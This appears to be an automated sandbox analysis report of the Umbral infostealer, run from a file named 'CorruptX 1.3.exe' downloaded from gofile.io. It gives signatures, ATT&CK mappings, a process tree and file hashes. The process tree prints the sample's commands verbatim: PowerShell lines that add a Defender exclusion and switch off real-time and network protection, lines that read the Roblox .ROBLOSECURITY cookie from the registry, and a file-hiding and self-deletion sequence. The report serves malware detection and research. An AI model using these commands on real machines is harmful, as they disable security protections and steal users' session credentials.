Analysis
-
max time kernel
1049s -
max time network
1041s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
22-01-2025 22:12
General
-
Target
https://gofile.io/d/S0Gn3I
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 56 IoCs
-
NTFS ADS 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 43 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/S0Gn3I1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8feab3cb8,0x7ff8feab3cc8,0x7ff8feab3cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6108 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5092 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1868,873086940474382066,8538751664818631973,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5176 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\CorruptX 1.3.exe"C:\Users\Admin\Downloads\CorruptX 1.3.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Downloads\CorruptX 1.3.exe"2⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\CorruptX 1.3.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\CorruptX 1.3.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
152B
MD5d7145ec3fa29a4f2df900d1418974538
SHA11368d579635ba1a53d7af0ed89bf0b001f149f9d
SHA256efc56eb46cf3352bf706c0309d5d740bca6ac06142f9bdc5e8344b81d4d83d59
SHA5125bb663ede88f8b7c96b09c1214aac68eda99bc09525ac383baa96914ff7d553ea1aed09e3c9d16893d791c81ddb164c682dfbb4759ac0bc751221f3e36558a91
-
Filesize
152B
MD5d91478312beae099b8ed57e547611ba2
SHA14b927559aedbde267a6193e3e480fb18e75c43d7
SHA256df43cd7779d9fc91fd0416155d6771bc81565e98be38689cb17caece256bf043
SHA5124086c4ebe410a37d0124fc8bd00c58775e70ab2b7b5a39b4e49b332ce5b4866c6775707436395467aff9596507c96fb4896f3bf0249c5b9c99a927f31dcc1a96
-
Filesize
1KB
MD5db045baf64311ec66fe41dc30bc28f93
SHA192b9dde67c574dd18f1994006405df0e5b570d77
SHA256a369dbb09d26de3d345e5b7491498f31c5d6b2340fc50565f7a8faa0f4c974ee
SHA512bc739679dd4b67ef009d49a52188281989c99ec0a0f55b6c6861a16ebb1b124cf86aa306c9bbed0fe2f84051187592e693175081d14fbfb20c772ca5bc737c7b
-
Filesize
144B
MD511bc37bbfd9427ef9b6ce3e61f63b55d
SHA1c6d45d441e6a22225402646fd1e1a0258fb35831
SHA256c88cdf4eaf60f3e584c855713881b717b1d93d986c4e70970a3ca73a0e829d7b
SHA512f8cfa7b8705408ff589ca0f4819b703992c374c1174676bb5de7986e305ced12f2f05b887f64b83799ace8aa9d193cd28869831eb9e617e60ed0cd1af4313847
-
Filesize
28KB
MD5def0abb8bffb9a60bd12591c965ff38a
SHA18a7e5ab0b6a315e7df7d12e8751a268565409848
SHA256bf99bd0d5f1827e5e8593f2936b90924ca815bebc229d35be5991ec457c4ff2d
SHA5120a1d6182f50d85f7f23826021ccfa6b8c70fe26344f2e0d1b6da56319e2b5b04951d32fdd5c8ebb5973d950a65d4f12a6a2a4ed79d870797b46bdf16c24a879a
-
Filesize
1KB
MD5d5bde528504e0f7e9d93455e2900dfe9
SHA16a542a3dda1948a95be908341271b81ee59b4882
SHA256b312fcfe15482996cb38a67877f110ed28431e1c3222e6e9136df78c9fd11bb6
SHA512f4c00f1b92c841923cfa54c32389de5b44791cd09eb034ba25e044ea9eee900a487fcc4208f238b9abaf4c7267832c307016553ae9997c907086be1b5df86db9
-
Filesize
2KB
MD56f3e3d636f121a4c60bf2cf49d31da04
SHA18ba87cb894aac6873d9986d59b885e998bfe4e48
SHA25683aaa7c3f5e14503630d82c806e3e5674861b93b9f56d92f257aac1880c8e5a7
SHA5121fb477c5acbceb988e5dc9bcc3396e353387b6dfe563de4dba367578e28b55c2fd8445b15d379e0b3213833c7161891cf569637237bfb34c17b22eb26da1466a
-
Filesize
2KB
MD593509145e75c86e5a920da17cc6b6a67
SHA1122cd7e6322eb3e1e071fd2da34e944660f2bdab
SHA25630433ef31d330be61c82a78722b5f6db794fb4ddc16b5bb80b9a552b14d25bfb
SHA512b76b5c09f9e5ff75b11a5a954aa1efafffc10d86db8183104666c170e952968839d47783876ca2f039de82799e709698b2da6f605260fc265939fdeadd7b696f
-
Filesize
2KB
MD5c54572a811ab5409cf9e0074861afb2d
SHA1d586fa441fc7015d9fd2c51b138cc7d0c25fb395
SHA25671c5c5364749e448a8661d15cb07279e8150091cda6c1c1ec5133173b33b20ea
SHA512479900eae36651671789f6eca23cd57f05edc902729d750400ffd7f0df37fcc08096c9094c1d737b440b43b824d1aba8aa18040d5f4d3d828e8d48287f691281
-
Filesize
2KB
MD557503d87129c1113dd1843d9fbbe749d
SHA1052d6b839c08da5ff44d14b3272a3879784c3cd8
SHA25693a51577965e5f293d111d08c8f19f1e669d030cba3bed150d9a7c810fae3a53
SHA5126246106c10c2a307befcc5fcfd0747970959a62838a60afc34c0eb56895cce0aa5b31d8bac2ce7bcdec3159038154d330c42c35331fa121e6fa831068ea9d52b
-
Filesize
2KB
MD5aab50328e781e228967e6ff6265a6fbf
SHA1a7fe2cbbf801cb0eeedb35e1af6f7838cf73a086
SHA2565c15bd68112fc9f860d58857c97d7337d2ff1fb78ec318eb6a280f7d666ba192
SHA51224730996717f3cea4c2b713f705a6d01abb936edea21a721e26e0a7da16ddf0f95764e58ae3b8e57db80324eeae0a903cb6d9b21bace95949935bd0a2cda1bf5
-
Filesize
2KB
MD5a883d15049e3bc399110bdfd4cc83a7f
SHA1b261b72b71990a9cea18c99f2392cf26f6e540ef
SHA2563c88824b2247c4c31d9dcb78b931c2601735579c9f7ce02eb9c5f13524ad8e85
SHA51253e1990ae32c77e0ae338748c22956337adbc0c235c92aee20d125c7910991a273705d56acf111baa01723c56a232aca00af83350827ce63c4cc425b74f56a01
-
Filesize
2KB
MD5ea2d735178cbeceb449a1bfea03cf054
SHA18e920947b5352ac7ba28f065529224f3247f6c6c
SHA25683fa764400459052a2cf9101d6bcff5883b64a1632150e5d332f8458d9a91c07
SHA5124d8ed4edacc0304537a8f17c5c149466dddfa74b44e07174396ac768716f80805c3866c5a52438440e36cefed9f01c04ef7084255520261bfe02770ec45a1257
-
Filesize
7KB
MD5f7be638cc9219876875174167a3dbbad
SHA13189994e2cfb25bdb6ab03f9d97727b7be7edea8
SHA2568a23549e8294fc6b3878ff0b8110a07b9a516a47411a492859e8394cece782bb
SHA512413bd1131b9bba0baa7a3cc88207424173a8eb3a2eba117b8075c6e08a016a559b4453cd88192a63568d7fbd6623a97b058237afd8f8f5f40eb6df8e33c00fd3
-
Filesize
5KB
MD546c6f434ed37387e45c927741b7fc57a
SHA1924e32cfa1212aa0eaaaf25e267fa7a51a61f0b7
SHA256c2a0ef6847e3edc1999997787113a9a45b3d1cd0919b72a4ea195cc38e69e1f9
SHA51283196d645c439c6fd7842da79f2b60042962a0e9606f06ee1f9c6a46e70423f55b88483bcc6970b05592b1c6d2c949fb5da6b7f40c16d046f71f5fef3da24273
-
Filesize
6KB
MD55ca5c03ee2d46f4344ef48b87e41ddad
SHA1868eb2a4199ae7b553a5be2566bb3d9b4645f51a
SHA256e721feb3686cd5480a6c347236a4d7d642b4efb91100d82d69c9f2b32c97942d
SHA5127a7d282578ffd9b323b4635c0b9c5813473d012f330cf2f30b96a808072113fc9ba0533f26a58dd6a51a3e5ad31e38aa1876cbd348f0a5a6747557b544dcb874
-
Filesize
7KB
MD5c72ef06766ae7cc57b43d3d9fbbe6efb
SHA185ba4fbcb35a190f100bcd5bd38abc4a6589610a
SHA256bb4b8c9511c863ce6202a5f5d6def0d00f24f83eaba6b16ef6b0e4f689f6fe94
SHA512004df370a40301ddae1837f2c45cf9da54dc0aeb2bdb94690937828fd1d607dfd4976b9522b92d5e656497b020c82100e69c4bef48b590b215abe93a40aeb2eb
-
Filesize
538B
MD5ee5c8525ca3a5c452f2b5d9541dbba53
SHA127ba68a71941187dd4ef2c0b9b8ec2dacaca7512
SHA256a8092879116b713e60751605f75c0e90fb10f29909189aeacc0c1c33227181d9
SHA512ee9fdb5675f72fd4175ee669cdf4c19b5dc5f4a012ca0125b6be5e81b02d811e907f5064a5d1bc5a48e108f73aba07951a8b4916261f5747b3f6aab82b1d81b5
-
Filesize
1KB
MD5fe62d6b565920407c4394672d298c315
SHA19355690a61c3e0d21954ccaebc520a671f15c94f
SHA2568d240f652554abb2e99071b780992cf1f205bc39a6fcedd1a02cfd020cc5d403
SHA51220018265f117c93341b936cfcd3fae8b1871b57badab4fea279d65cea9bab9cc11547a62862c885067ec15097b2671066cfe439f44caa0f5f0034b688f09db1d
-
Filesize
538B
MD5560a9cd9690a59b629192d41f8fdbcb3
SHA18c0b0595c7b95e9bcbcc049e368cc78c704ee418
SHA25685a3e14ef2284089e2e23296e74a9022a1500326d610639bff6d0f2d2fdfb291
